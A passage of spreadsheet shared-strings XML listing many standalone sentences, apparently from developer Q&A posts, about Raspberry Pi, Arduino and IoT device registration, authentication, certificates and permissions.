    <t>The draw back using project Rome instead of building your own server side is that project Rome requires your users to sign in with a Microsoft account</t>
  </si>
  <si>
    <t>I read the official documentation but I do not know how Arduino should make the request to enter the authentication information.</t>
  </si>
  <si>
    <t>This feature is useful for example for finishing uninstall process, where after next reboot of computer, a special "clenaup" program is run once to delete locked files.</t>
  </si>
  <si>
    <t>For those interested in hacking or look at the internals, you can also download the Apache 2.0 licensed source.</t>
  </si>
  <si>
    <t>I am currently required to connect to my university's system of password protected rasberry pi's where I have to edit files to complete weekly projects.</t>
  </si>
  <si>
    <t>The action is capable of registering if I did this task or not.</t>
  </si>
  <si>
    <t>Please help me,
Thanks in Advance
Supriya
I have created a thing and its respective certificates.</t>
  </si>
  <si>
    <t>The documentation says:
@note This function does not modify pin configuration.</t>
  </si>
  <si>
    <t>http://elinux.org/RPi_VerifiedPeripherals
This is a list of all verified devices for the pi I found.</t>
  </si>
  <si>
    <t>The TPM is a passive device, it cannot "validate boot partition integrity".</t>
  </si>
  <si>
    <t>You can skip verifying the certificate if you want but then you won't be certain you're actually connecting to the real server instead of a server impersonating it.</t>
  </si>
  <si>
    <t>Registering the control with its parent form.</t>
  </si>
  <si>
    <t>captcha verification)
A download of the library can be found at https://bitbucket.org/pierrejoye/gd-libgd/downloads</t>
  </si>
  <si>
    <t>Running 
sudo certmgr -ssl -v -m "https://XXXXX.azurewebsites.net"
Tells me it Adds two certificates on the first time.</t>
  </si>
  <si>
    <t>As the two kinds of chips use entirely different methods of authentication, this will not work.</t>
  </si>
  <si>
    <t>A RADIUS server is used to authenticate the subscriber's credentials.</t>
  </si>
  <si>
    <t>When I first plugged in the board, it failed to detect the device.</t>
  </si>
  <si>
    <t>I downloaded the Wi-Fi Shield Library, there are some example codes.</t>
  </si>
  <si>
    <t>I am wondering if it might be a permissions thing regarding access to certain files.</t>
  </si>
  <si>
    <t>I have checked the permission on the videos and they are all the same owned by the user who runs the script.</t>
  </si>
  <si>
    <t>I would like to execute a script when I am at home and my iPhone's presence is registered in my LAN.</t>
  </si>
  <si>
    <t>command, which checks if the SIM-card is registered at the provider.</t>
  </si>
  <si>
    <t>I am 80% sure it is a flaw within my Android code.</t>
  </si>
  <si>
    <t>OK I am stumped and its possible I have just not had enough experience with android, so I dont know which permissions to use.</t>
  </si>
  <si>
    <t>So i'm on my Raspberry pi, and i'm wanting to check to see if a sensor has been activated.</t>
  </si>
  <si>
    <t>The WiFi shield has the most current firmware (V1.1.0).</t>
  </si>
  <si>
    <t>and after that authentication i want to resume that shell session.</t>
  </si>
  <si>
    <t>Is it a option that to detect a release of a key?</t>
  </si>
  <si>
    <t>I wrote codes, but i couldnt success.</t>
  </si>
  <si>
    <t>It's only that the software is not being able to detect it.</t>
  </si>
  <si>
    <t>Button press is detected and system shutdown is initialed.</t>
  </si>
  <si>
    <t>Just to mention Im using an Uno r3, official Wifi shield and official motor shield.</t>
  </si>
  <si>
    <t>But I cannot clearly understand what is the difference between Intel Galileo and Intel Edison?</t>
  </si>
  <si>
    <t>But sometimes the alarm is not activated and my leds are not flashing.</t>
  </si>
  <si>
    <t>I'm getting this AudioTrack warning
in my Android app for a button I'm subclassing.</t>
  </si>
  <si>
    <t>I tried to register into DIGI forum to ask this questions, but I think they have some error.</t>
  </si>
  <si>
    <t>I'm trying to build an access point / hotspot with a Raspberry Pi, a wifi dongle and NetworkManager.</t>
  </si>
  <si>
    <t>My app can send data to arduino without hassle and I have verified it.</t>
  </si>
  <si>
    <t>I wanted to setup a torrent server with my Rasberry Pi 2 and with a 16GB USB.</t>
  </si>
  <si>
    <t>This is the Code I'm using , with the credentials cut out of course.</t>
  </si>
  <si>
    <t>Does someone know how to obtain these information?</t>
  </si>
  <si>
    <t>While writing this post, I went through all the steps again, just to be safe.</t>
  </si>
  <si>
    <t>Should the probe be done manually to locate the devices?</t>
  </si>
  <si>
    <t>Can someone tell me if there is a way for the Raspberry PI to know that the laptop has successfully connected or disconnected?</t>
  </si>
  <si>
    <t>I am currently backing manually using FileZilla and phpMyAdmin.</t>
  </si>
  <si>
    <t>Next we were ask to register a "Thing" in AWS IoT platform.</t>
  </si>
  <si>
    <t>AutoDetect firmware
Communication with MCU established.</t>
  </si>
  <si>
    <t>Cooking hacks eHealth shield
Thanks in advance</t>
  </si>
  <si>
    <t>But I tried to code for the network with proxy settings (proxy hostname,Static IP settings ) which has Internet.</t>
  </si>
  <si>
    <t>I am a Linux novice and currently developing a security system using Raspberry Pi 3 and MotionEye.</t>
  </si>
  <si>
    <t>Is it a safe way to access the file for reading ?</t>
  </si>
  <si>
    <t>So I have set up g_serial on the Pi and successfully logged into it using minicom.</t>
  </si>
  <si>
    <t>I get 
[1] 1473
[2] 1474
[3] 1475
[1]+  Stopped                 sudo omxplayer rtsp://192.168.0.88:554/user=admin
[2]   Done                    password=
[3]   Done                    channel=1
how can I stream a video faster on raspberry pi 3?</t>
  </si>
  <si>
    <t>- Give Wifi infos (SSID, PASSWORD) by go to 192.168.4.1 from web browser.</t>
  </si>
  <si>
    <t>~Is there any way to limit access to commands such as chmod that could potentially cause security threats?</t>
  </si>
  <si>
    <t>On Raspberry Pi #2, it will try to subscribe the MQTT from AWS using the same host, same Thing, same key and same certificate as Raspbery Pi #1.</t>
  </si>
  <si>
    <t>The certificate has not yet been activated
Output of lsb_release -a:
$ lsb_release -a
No LSB modules are available.</t>
  </si>
  <si>
    <t>I tried using winscp, but it did not allow me to connect using default credentials.</t>
  </si>
  <si>
    <t>The profile is mentioned as SERIAL_PORT_PROFILE in the raspberry code.</t>
  </si>
  <si>
    <t>Whichever it is, i need to be able to somehow obtain it based on the user's cognito identifier (the sub).</t>
  </si>
  <si>
    <t>I am trying to provide wifi details to raspberry pi though Bluetooth.</t>
  </si>
  <si>
    <t>These devices are connected to the access point with wifi.</t>
  </si>
  <si>
    <t>Network settings and old logs are still there.</t>
  </si>
  <si>
    <t>But the Same Doesn't get Detected when I connect the Device to a USB Port on Raspberry Pi 3.</t>
  </si>
  <si>
    <t>For all means, we can consider that the devices are protected, but that the Ethernet network may be accessed.</t>
  </si>
  <si>
    <t>I read that the device registration id has to be the same as the CN.</t>
  </si>
  <si>
    <t>I access the Raspberry Pi IP address  from another Ethernet connected device.</t>
  </si>
  <si>
    <t>Most of all, I'd like to know why the camera is detected, but when I try to open it I get "No such device".</t>
  </si>
  <si>
    <t>This works when my object with credentials etc.</t>
  </si>
  <si>
    <t>The certificates of both are stored in IoTHub (verified).</t>
  </si>
  <si>
    <t>and a x509 certificate group enrollment?</t>
  </si>
  <si>
    <t>The problem I am having is dhcp is not telling dns to register new ip addresses.</t>
  </si>
  <si>
    <t>If there is no acknowledgement from a device, I will attempt again up to 3 tries.</t>
  </si>
  <si>
    <t>I have tried giving my bash script permissions chmod 777 x.sh &amp; chmod 755 x.sh</t>
  </si>
  <si>
    <t>Please let me know if there is any other information that needs to be known but any help in letting me understand my system would be greatly appreciated.</t>
  </si>
  <si>
    <t>i think that this may be related to authentication keys (something i don't understand very well)</t>
  </si>
  <si>
    <t>I do not want a user to register each and every device individually.</t>
  </si>
  <si>
    <t>Until today, the access point worked.</t>
  </si>
  <si>
    <t>Mar  2 22:09:02 raspberrypi avahi-daemon[313]: Registering new address record for fe80::ba27:ebff:fe4e:86bf on eth0.*.</t>
  </si>
  <si>
    <t>I want to know how to do something like giving a device an ID and having it connect to an account.</t>
  </si>
  <si>
    <t>There I met the IoT provision services which can be used to register the devices programmatically.</t>
  </si>
  <si>
    <t>I use Just-in-Time Registration of Device Certificates on AWS IoT.</t>
  </si>
  <si>
    <t>I'm sure the usb ports are working because it detects other devices.</t>
  </si>
  <si>
    <t>PS Chip Enabled link-ed to 3.3v PIN.</t>
  </si>
  <si>
    <t>It says the product has been registered right.</t>
  </si>
  <si>
    <t>I'm coding a smart bulb firmware demo using an ESP8266.</t>
  </si>
  <si>
    <t>So my Question is:
How can I access the Keys of this Case from the Android Device?</t>
  </si>
  <si>
    <t>If you are serious about SDI-12 firmware development, you may want to invest in an SDI-12 Verifier.</t>
  </si>
  <si>
    <t>I have hacked Libelium's XBee shield to reroute the pin 1/0 of the board to 2/3, where I used a  connection.</t>
  </si>
  <si>
    <t>It also explains why this is the method for detecting what's connected.</t>
  </si>
  <si>
    <t>Barring that, the fuses might have gotten messed up or the code erased.</t>
  </si>
  <si>
    <t>If there have been any read errors they have been undetected and never reported.</t>
  </si>
  <si>
    <t>Once you are logged in you will have a list of target station that you have registered.</t>
  </si>
  <si>
    <t>An app can request to get notifications when one or more iBeacons appear or disappear.</t>
  </si>
  <si>
    <t>You could potentially destroy your system.</t>
  </si>
  <si>
    <t>If your goal is to obtain the ip addresses of the system, consider using getifaddrs instead.</t>
  </si>
  <si>
    <t>Or possibly if the device has an Ethernet Shield.</t>
  </si>
  <si>
    <t>For this to work both your laptop and Raspberry Pi must be connected in same network through Wi-Fi or Ethernet.</t>
  </si>
  <si>
    <t>As much as I've understood, your looking for a way to transfer data from  to your VPS by means of ssh.</t>
  </si>
  <si>
    <t>You mentioned that you don't need to use handshake.</t>
  </si>
  <si>
    <t>Tried firmware versions 22, 24 and 29.</t>
  </si>
  <si>
    <t>You can be certain that the device has powered if it has USB enumerated.</t>
  </si>
  <si>
    <t>Instructions for setup by dentaku65:
First of all register your account on Freedns.</t>
  </si>
  <si>
    <t>Verify Wifi shield with any sketch.</t>
  </si>
  <si>
    <t>But you can do non-captive Wifi, or captive Ethernet...</t>
  </si>
  <si>
    <t>When a device is registered with IotF, it then has its own topic space and credentials.</t>
  </si>
  <si>
    <t>(but of course not a total security option because of this.)</t>
  </si>
  <si>
    <t>Another thing you should consider is verification of your data.</t>
  </si>
  <si>
    <t>If so, the easiest may be to auto-login the Pi (or the user will need to login with the keyboard on startup).</t>
  </si>
  <si>
    <t>It's a safety thing.</t>
  </si>
  <si>
    <t>Take into account that the user must have at least READ permissions on that file.</t>
  </si>
  <si>
    <t>Try to validate your credentials with this paho GUI app.</t>
  </si>
  <si>
    <t>2.verify MSP430 RX working: send from Pi known value every 1 sec.</t>
  </si>
  <si>
    <t>First of all verify your Rx/Tx connections.</t>
  </si>
  <si>
    <t>If you want to securise the transmission (so nobody can reboot your app), just include some password and HTTPS :)
See ya !</t>
  </si>
  <si>
    <t>It looks like you never close the Access Point.</t>
  </si>
  <si>
    <t>If you are using the Linux system you can use dmesg to see if your system detected the device properly.</t>
  </si>
  <si>
    <t xml:space="preserve">
not able to register the device with ./out/host/examples/hvac/hvac -r xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx.</t>
  </si>
  <si>
    <t>Therefore you don't see the normal Android permissions UI.</t>
  </si>
  <si>
    <t>One option you have is to use a travel router to bridge the captive
  portal network to a non-captive portal network.</t>
  </si>
  <si>
    <t>Here's a related SO post which might help: How do I connect to the Google Calendar API without the oAuth authentication?</t>
  </si>
  <si>
    <t>The user you specify does not have to be already enrolled with the fabric.</t>
  </si>
  <si>
    <t>This CMAC can be verified by the backend.</t>
  </si>
  <si>
    <t>They must register your app before you submit it to the App Store.</t>
  </si>
  <si>
    <t>The openwrt img doesn't activate wifi by default.</t>
  </si>
  <si>
    <t>it mentions about PiBakery which will install rasbian with ssh support.</t>
  </si>
  <si>
    <t>First you need to register on their site.</t>
  </si>
  <si>
    <t>In the corner you will see ethernet and wlan, under gateway will be your ip adress.</t>
  </si>
  <si>
    <t>Have you verified with a wireshark capture or some such?</t>
  </si>
  <si>
    <t>When you are enrolling, give the server address as {IP}:8280 and username/password as admin/admin.</t>
  </si>
  <si>
    <t>Connected to wifi
So your board is able to get a network connection.</t>
  </si>
  <si>
    <t>Keep out the sensitive data from code regardless of the IDE.</t>
  </si>
  <si>
    <t>It should only be allowed to run when there is no object detected.</t>
  </si>
  <si>
    <t>Microphone identification
The command arecord -l will give us the list of ALSA devices.</t>
  </si>
  <si>
    <t>Are you ssh'ing to the raspberry pi from another computer?</t>
  </si>
  <si>
    <t>You'll most likely want to verify the server's identity once you connect.</t>
  </si>
  <si>
    <t>You need write permissions om the directory as well.</t>
  </si>
  <si>
    <t>You can choose any one of the authentications when registering the device like this:</t>
  </si>
  <si>
    <t>If the file is detected than you can execute what you want.</t>
  </si>
  <si>
    <t>Now all the repositories can be detected and used.</t>
  </si>
  <si>
    <t>See https://www.getpostman.com/docs/v6/postman/sending_api_requests/certificates for more detailed instructions.</t>
  </si>
  <si>
    <t>The problem is because of the same MAC Address of access points.</t>
  </si>
  <si>
    <t>In Windows IoT Core, there is no credential manager app used to manage the credentials.</t>
  </si>
  <si>
    <t>The root cert is correct... That tutorial you linked is WAY more complicated than it needs to be.</t>
  </si>
  <si>
    <t>Not sure why if we didn't provide  it working but has a warning said that the device is not registered yet.</t>
  </si>
  <si>
    <t>Register checks are better.</t>
  </si>
  <si>
    <t>A few things, the wifi.h module, I believe, does not support https.</t>
  </si>
  <si>
    <t>This gives data transparency as well.</t>
  </si>
  <si>
    <t>Also, verify that your user is in the dialout group.</t>
  </si>
  <si>
    <t>So, two categories of firmware are used in Arduino: I) Bootloader II) User's Customize firmware.</t>
  </si>
  <si>
    <t>when your code detects the ON signal on that port then do a handshake.</t>
  </si>
  <si>
    <t>Conch is an SSHv2 implementation written in Python.</t>
  </si>
  <si>
    <t>You can use Sleak to detect leaks in SWT application code.</t>
  </si>
  <si>
    <t>Shield is the security layer in Elasticsearch</t>
  </si>
  <si>
    <t>Read Microsoft's Access databases on *nix</t>
  </si>
  <si>
    <t>The LexikJWTAuthenticationBundle provides authentication via Json Web Token for Symfony2+ REST API .</t>
  </si>
  <si>
    <t>Amazon policy - is a document that formally states one or more permissions.</t>
  </si>
  <si>
    <t>Account kit is available for Android, iOS and web.</t>
  </si>
  <si>
    <t>It is an algorithmic trading library for crypto-assets written in Python.</t>
  </si>
  <si>
    <t>SSHJ is an SSH Client library written in Java.</t>
  </si>
  <si>
    <t>Values and their semantics will be registered by the HTML registration authority.</t>
  </si>
  <si>
    <t>Listing registered users.</t>
  </si>
  <si>
    <t>For example: AC power disconnected or WiFi network detected.</t>
  </si>
  <si>
    <t>Isabelle is a generic proof assistant, which is best-known for its Isabelle/HOL instance.</t>
  </si>
  <si>
    <t>For a modern replacement, see mcrypt.</t>
  </si>
  <si>
    <t>Allegro now claims to have seven million users with a new user registering every 16 seconds.</t>
  </si>
  <si>
    <t>The SSPI is the implementation of the Generic Security Service API (gssapi) in Windows.</t>
  </si>
  <si>
    <t>You can obtain Xcode in Mac App Store for free.</t>
  </si>
  <si>
    <t>Authentication and verification is done in seconds via the API.</t>
  </si>
  <si>
    <t xml:space="preserve">
Symfony security component provides a complete security system for
  your web application.</t>
  </si>
  <si>
    <t>If SQLEXPRESS is not available then LocalDb will be registered as the default.</t>
  </si>
  <si>
    <t>Foolproof session keys.</t>
  </si>
  <si>
    <t>It also provides embedded masking by means of 8 opmask registers.</t>
  </si>
  <si>
    <t>Zombie tag slated for auto-deletion, please don't use.</t>
  </si>
  <si>
    <t>It can verify array bounds, pointer safety, exception catchment and user-specified assertions.</t>
  </si>
  <si>
    <t>Why is the gets function so dangerous that it should not be used?</t>
  </si>
  <si>
    <t>More Info
OAuth Authorization model - Yahoo Developers official page
Yahoo OAuth 2.0 - official Guide</t>
  </si>
  <si>
    <t>Even lists some undocumented and Cyrix-only MMX instructions.</t>
  </si>
  <si>
    <t>Read more at the Wikipedia article Computer forensics.</t>
  </si>
  <si>
    <t>Provide access to many gitolite users: 
they are not "real" users, so they do not get
shell access.</t>
  </si>
  <si>
    <t>A seller account is needed to access the forums.</t>
  </si>
  <si>
    <t>Therefore do not use it, use one of the following, as appropriate:
sts-securitytokenservice, sts-simple-templatesystem, or sts-springsourcetoolsuite</t>
  </si>
  <si>
    <t>AM I maybe missing some permission in the server or on the Android?</t>
  </si>
  <si>
    <t>I read somewhere you need to auth a block or something?</t>
  </si>
  <si>
    <t>All three devices can detect each other without any problems.</t>
  </si>
  <si>
    <t>But when I do the next tutorial with the helloworld example, the code does not verify correctly.</t>
  </si>
  <si>
    <t>The problem is, how to tell the code that whether the gun is detected or not?</t>
  </si>
  <si>
    <t>Is their a way to download ALL the modules downloaded onto the Intel Edison?</t>
  </si>
  <si>
    <t>eCryptFS can read passphrase from file or take it as mount argument.</t>
  </si>
  <si>
    <t>Everything is working and I've been able to successfully connect via SSH from my computer while connected to the same network in my home.</t>
  </si>
  <si>
    <t>Windows 7 says access denied and Rasbian says Can't open file to write.</t>
  </si>
  <si>
    <t>Raspbian has a login password which is the first thing I have to remove.</t>
  </si>
  <si>
    <t>I am not able to understand how watch dog timer is initialized on Intel Galileo.</t>
  </si>
  <si>
    <t>I'm trying to verify the captcha from Google reCaptcha 2.0 but it said that the captcha is not correct (solve more).</t>
  </si>
  <si>
    <t>This didn't work as it appears my onclick methods aren't being registered.</t>
  </si>
  <si>
    <t>Cant reboot through ssh either.</t>
  </si>
  <si>
    <t>To connect with a telnet app, the IP is needed to insert in Android phone.</t>
  </si>
  <si>
    <t>I have connected to the NodeMCU access point on my desktop.</t>
  </si>
  <si>
    <t>The only thing I'm still afraid is, how to protect my code from others?</t>
  </si>
  <si>
    <t>But when I do " sudo i2cdetect -y 1"
only RTC is detected not the camera.</t>
  </si>
  <si>
    <t>Is there a way to change the default permissions so that the group 'tty' always has read access?</t>
  </si>
  <si>
    <t>It's my first time on Stack, be merciful please :D
I'm in Internship, and I work to run TrustZone on a Raspberry pi.</t>
  </si>
  <si>
    <t>When I manually load login_form.js file, riot is able to read it correctly.</t>
  </si>
  <si>
    <t>clamscan has a --move option for infected files.</t>
  </si>
  <si>
    <t>And can I use the coordinator as API and router as AT mode or I must use all of its node in API mode to verify mesh network and why??</t>
  </si>
  <si>
    <t>I'm able to verify enrolled fingerprints.</t>
  </si>
  <si>
    <t>Although I seem to be entering the right credentials, it says error 21, can't connect to server.</t>
  </si>
  <si>
    <t>I am creating an android application which connects to AWS IoT using Amazon Cognito authentication.</t>
  </si>
  <si>
    <t>if so, how can we provide a function for registering that device?</t>
  </si>
  <si>
    <t>So I don't worry much about the security issue.</t>
  </si>
  <si>
    <t>My Raspberry-pi2 keeps corrupting SD card many times.</t>
  </si>
  <si>
    <t>However it looks like you can download the certificate after it's been created.</t>
  </si>
  <si>
    <t>I have everything working, I just need to lock things down.</t>
  </si>
  <si>
    <t>How do I encrypt the whole data (and not only verify the server)?</t>
  </si>
  <si>
    <t>And it works, until I added an ethernet shield.</t>
  </si>
  <si>
    <t>So I neither can see any kernel messages nor shell into the device.</t>
  </si>
  <si>
    <t>As for the credentials, I created a new user in IAM.</t>
  </si>
  <si>
    <t>I understand that to read an UID you don't need to authenticate, right?</t>
  </si>
  <si>
    <t>The OS seems to become corrupt over time.</t>
  </si>
  <si>
    <t>My issue is that I do not like having to ssh into the pi and run the script I have written in order to use the robot (robot.py).</t>
  </si>
  <si>
    <t>So the credentials I am using, are correct.</t>
  </si>
  <si>
    <t>I am trying to detect raspberry pi device from my iPad.</t>
  </si>
  <si>
    <t>XAML;
Update - 24-11-2017
I am not sure if this is the best was to verify my password.</t>
  </si>
  <si>
    <t>Reading the datasheet I see that response 0 means that the command is invalid.</t>
  </si>
  <si>
    <t>Sometimes when I reboot my rpi, I cannot login through ssh afterwards.</t>
  </si>
  <si>
    <t>Does anyone know of any other method to obtain the device IP?</t>
  </si>
  <si>
    <t>To do so it must have an API key to authenticate itself.</t>
  </si>
  <si>
    <t>To do so, it generates and imports a credential.json file into the project and somehow generates credentials from it.</t>
  </si>
  <si>
    <t>It will connect to the wifi, but will not activate the event.</t>
  </si>
  <si>
    <t>Poky, meta-embedded &amp; meta-raspberry were obtained with git clone -b.</t>
  </si>
  <si>
    <t>I'm trying to detect whether a key is pressed down or not.</t>
  </si>
  <si>
    <t>I encoded ffe1 in my homebrewed android application, which works as a master to pair with the HM-10.</t>
  </si>
  <si>
    <t>Registers beyond 255 using slave 1 cannot be accessed.</t>
  </si>
  <si>
    <t>I have replaced all the necessary credentials.</t>
  </si>
  <si>
    <t>BUT I don't want to access this as root every time I need it.</t>
  </si>
  <si>
    <t>So far this is what I have in the second microcontroller that detects the keys:
The key value generating micro has a 20Mhz crystal and the other micro has a 22Mhz crystal.</t>
  </si>
  <si>
    <t>But if try to get manifest https://warlibregistry.azurecr.io/v2/iot-edge-engine-simulator/manifests/0.0.1-amd64 I really got the JSON with the error "unauthorized: authentication required".</t>
  </si>
  <si>
    <t>I am trying to implement OP-TEE trust OS on Raspberry Pi 3.</t>
  </si>
  <si>
    <t>Then downloaded cert, private key and rootCa certificate too.</t>
  </si>
  <si>
    <t>The error I am getting is this:
"Error while trying to create a new device: DeviceAlreadyExistsError: A device with ID 'Device1' is already registered.</t>
  </si>
  <si>
    <t>Could be overcome by writing an empty file named ssh into / .</t>
  </si>
  <si>
    <t>There are no errors while registering the device and I am getting a message that the device is "Connected" on "IBM Watson IOT Platform" console.</t>
  </si>
  <si>
    <t>I am not sure how to enter my api-key for authentication and other access.</t>
  </si>
  <si>
    <t>WiFi ONLY works if Ethernet is plugged in Pi.</t>
  </si>
  <si>
    <t>I have an access key, secret key, endPoint, and region.</t>
  </si>
  <si>
    <t>I want to subscribe a Iot shadow using cognito credentials.</t>
  </si>
  <si>
    <t>Now I have access to the namespace and was able to reboot and shutdown my device.</t>
  </si>
  <si>
    <t>When the device certificate is registered, the lambda is started.</t>
  </si>
  <si>
    <t>Lambda uses a certificate id to create the name of the thing.</t>
  </si>
  <si>
    <t>EDIT:
all the capitals with $ are substituted from me to cloack security stuff</t>
  </si>
  <si>
    <t>I have registered the agent as a context provider, as explained in the tutorial.</t>
  </si>
  <si>
    <t>I have different buttons that are use to read a password, but I need the    to show the records.</t>
  </si>
  <si>
    <t>It will never have network contact with the outside world, so I'm not worried about security.</t>
  </si>
  <si>
    <t>The goal is to configure my WiFi credentials by conecting directly to the ESP32 in AP Mode first.</t>
  </si>
  <si>
    <t>Im making a doorlock using a raspberry pi, and blynk.</t>
  </si>
  <si>
    <t>I've patched my Raspbian OS with the PREEMPT_RT patch to make my OS preemptable.</t>
  </si>
  <si>
    <t>Instead I get a message about the kernel being tainted.</t>
  </si>
  <si>
    <t>The device has been provisioned with IoT DPS (code not shown here), then registered via the code below.</t>
  </si>
  <si>
    <t>I already tried looking at other guides and changing permissions but nothing seems to work.</t>
  </si>
  <si>
    <t>The  is created for the device and it's certificate is registered.</t>
  </si>
  <si>
    <t>The only thing is: it is always returning an invalid_handle_value.</t>
  </si>
  <si>
    <t>Is this possible without hacking the Arduino IDE?</t>
  </si>
  <si>
    <t>but problem is there my card reader accessory is not a MFI registered.</t>
  </si>
  <si>
    <t>I don't seem to be running into any issues yet, but I wanted to verify.</t>
  </si>
  <si>
    <t>In the latter case you will need to provide the password to your device at some point after flashing.</t>
  </si>
  <si>
    <t>Each device has a unique identifer and can be read.</t>
  </si>
  <si>
    <t>Does your Arduino firmware advertise the signature that is understood by DemoKit?</t>
  </si>
  <si>
    <t>I need to be root to access (perhaps only to get write permission to) /dev/ttyUSB0 on my system.</t>
  </si>
  <si>
    <t>You can just start reading without using authentication.</t>
  </si>
  <si>
    <t>It seems, iwconfig doesn't support WPA/WPA2, only unencrypted networks or WEP, which is essentially the same nowadays.</t>
  </si>
  <si>
    <t>Check out Bin/Dec/Hex Converter to verify.</t>
  </si>
  <si>
    <t>That way you don't need to worry about blocking code, anywhere.</t>
  </si>
  <si>
    <t>I plan to go for Xtion now too - and I hope to get deactivate as much as possible from the USB bus (as this seems to be the bottleneck, for the Kinect too I think).</t>
  </si>
  <si>
    <t>This can't be secret, it is your API, the user can't use it if you don't tell them about it.</t>
  </si>
  <si>
    <t>You do not access device registers directly.</t>
  </si>
  <si>
    <t>Where do you want to enter the credentials?</t>
  </si>
  <si>
    <t>I have an app that ranges for an iBeacons.</t>
  </si>
  <si>
    <t>After that, you can use  to verify your change.</t>
  </si>
  <si>
    <t>It has huge security implications.</t>
  </si>
  <si>
    <t>The core guarantee made by  is that you can always read a value.</t>
  </si>
  <si>
    <t>They mention that new "certified" (signed?)</t>
  </si>
  <si>
    <t>Don't know why, it seems that until now I was running the first time without admin permissions.</t>
  </si>
  <si>
    <t>No need to try and pass credentials.</t>
  </si>
  <si>
    <t>configure static ip on the raspberry pi:
and then add:
then you can acces your raspberry via ssh
ssh pi@169.254.0.2</t>
  </si>
  <si>
    <t>(your application could be very corrupt at this point).</t>
  </si>
  <si>
    <t>You could just use Lamp, Linux, and SSH to access it anywhere which is basically the same thing.</t>
  </si>
  <si>
    <t>That code is much more likely to be in sync with the firmware.</t>
  </si>
  <si>
    <t>After that you have to obtain your public IP () and use it to access from the SIM900.</t>
  </si>
  <si>
    <t>Alternatively,  in the QIREGAPP case, you also need to specify the APN, username, and password.</t>
  </si>
  <si>
    <t>HTTP using IAM credentials
2.</t>
  </si>
  <si>
    <t>Probably needless to say, but obviously you should use unique credentials on this device that you use nowhere else and for no other puspose.</t>
  </si>
  <si>
    <t>All you need to know are a couple of credentials.</t>
  </si>
  <si>
    <t>Could you verify whether core is up.</t>
  </si>
  <si>
    <t>Another thing is that you're trying to access enumeration that is protected subtype of your MPU9250.</t>
  </si>
  <si>
    <t>From your picture, you used the specified device SAS token.</t>
  </si>
  <si>
    <t>You need use IoT hub-level credentials.</t>
  </si>
  <si>
    <t>Unplugging and re-plugging devices shouldn't matter.</t>
  </si>
  <si>
    <t>I think you mean it goes into AP mode to prompt the user for the credentials.</t>
  </si>
  <si>
    <t>Verify your hardware at first.</t>
  </si>
  <si>
    <t>SSH (http://sumoudou.org/How%20to%20ssh%20into%20an%20Android%20phone%20over%20USB.html)
Serial over USB.</t>
  </si>
  <si>
    <t>encrypted radio) of transmitting keys to devices.</t>
  </si>
  <si>
    <t>This seems to attach a new certificate to my thing.</t>
  </si>
  <si>
    <t>I would just have to see how feasible it is to hack the firmware.</t>
  </si>
  <si>
    <t>but one thing to check is user permissions.</t>
  </si>
  <si>
    <t>Your module does not automatically register to network.</t>
  </si>
  <si>
    <t>Here is a blog post that tells you how to turn on a light with a Raspberry Pi 2 when a beacon is detected.</t>
  </si>
  <si>
    <t>So you don't have to worry about doing your own encryption.</t>
  </si>
  <si>
    <t>I don't have any of this hardware to verify this, but from 'PN532-PN532_HSU\NDEF\README.md'
Try using the above in your code?</t>
  </si>
  <si>
    <t>You need write permissions with sudo usermod -a -G ftpgroup pi or you can can add pi user to sudo group with visudo, its work for me you please try once and let me know.</t>
  </si>
  <si>
    <t>FYI, oauth2client is deprecated, consider using other things.</t>
  </si>
  <si>
    <t>(Most hardware beacons don't even do this.)</t>
  </si>
  <si>
    <t>This command will return the Certificate ARN attached to your thing.</t>
  </si>
  <si>
    <t>No need for firmware update as you mentioned.</t>
  </si>
  <si>
    <t>But as far as I can tell it cant be done unless somebody hacks the nextion firmware.</t>
  </si>
  <si>
    <t>This implies risk for the other devices in your network.</t>
  </si>
  <si>
    <t>I don't think they're encrypted, and you could read these files (e.g.</t>
  </si>
  <si>
    <t>You give us a non valid C++ code, it contains plenty of errors.</t>
  </si>
  <si>
    <t>Take note that alias will be kept after reboot!</t>
  </si>
  <si>
    <t>That's a bit hacky though.</t>
  </si>
  <si>
    <t>A certificate analysis is available at https://www.ssllabs.com/ssltest/analyze.html?d=api.pushbullet.com.</t>
  </si>
  <si>
    <t>Try verifying that it is at least 1024, and increase as needed.</t>
  </si>
  <si>
    <t>Yes,  is a privileged instruction.</t>
  </si>
  <si>
    <t>How to create Insecure RFCOMM Socket in Android?</t>
  </si>
  <si>
    <t>Algorithm to detect similarities between hashes.</t>
  </si>
  <si>
    <t>The most common cause of this is improper credentials (i.e.</t>
  </si>
  <si>
    <t>Nginx header to provide access-controlled downloads</t>
  </si>
  <si>
    <t>bower register   is bower CLI command to register a module/package.</t>
  </si>
  <si>
    <t>The equality must be verified using Equals.</t>
  </si>
  <si>
    <t>Specifies that dirty reads are allowed.</t>
  </si>
  <si>
    <t>secret: '13652805320794272084', // Obtained from the socket.io server.</t>
  </si>
  <si>
    <t>Invalid markup is a thing of the past with XHP.</t>
  </si>
  <si>
    <t>An SSH connection link identifier, obtained from a call to ssh2_connect().</t>
  </si>
  <si>
    <t>A time bomb is similar to, but not the same as, trialware.</t>
  </si>
  <si>
    <t>to obtain values that will be accepted by SCE / privileged contexts.</t>
  </si>
  <si>
    <t>Wiki: https://en.wikipedia.org/wiki/Time-based_One-time_Password_Algorithm</t>
  </si>
  <si>
    <t>Can register IoT Agents.</t>
  </si>
  <si>
    <t>After setting the board in DFU mode and flashing it with the HEX, the board wont get recognized.</t>
  </si>
  <si>
    <t>This error came up after verifying the Arduino code.</t>
  </si>
  <si>
    <t>The following code is for wifi shield.</t>
  </si>
  <si>
    <t>What would be the "safest" setting?</t>
  </si>
  <si>
    <t>Why not to upgrade anyway to SHA256?</t>
  </si>
  <si>
    <t>I need to show a lockscreen after 15 seconds of user inactivity.</t>
  </si>
  <si>
    <t>This code from my standpoint is fine as it detects keys.</t>
  </si>
  <si>
    <t>I need to get the arduino data that is saved in the MicroSD, in the case user and password, and pass to listview of my GUI, with interaction to sqlite.</t>
  </si>
  <si>
    <t>Instrument has Bluetooth module as well, Bluetooth will help to upgrade the firmware.</t>
  </si>
  <si>
    <t>The WiFi and the Ethernet shields.</t>
  </si>
  <si>
    <t>You just don't have permission to write to that device, that's why it worked with sudo.</t>
  </si>
  <si>
    <t>As is written above login to your R-Pi via SSH.</t>
  </si>
  <si>
    <t>There is no possible way to deactivate AVAudioSession without audioTrack being deinitialized for now.</t>
  </si>
  <si>
    <t>Sudo is not just elevating the permissions, but may contain different settings.</t>
  </si>
  <si>
    <t>A: Because we need "Trustful" option, before flashing the application.</t>
  </si>
  <si>
    <t>Try using the TrustedCerts option.</t>
  </si>
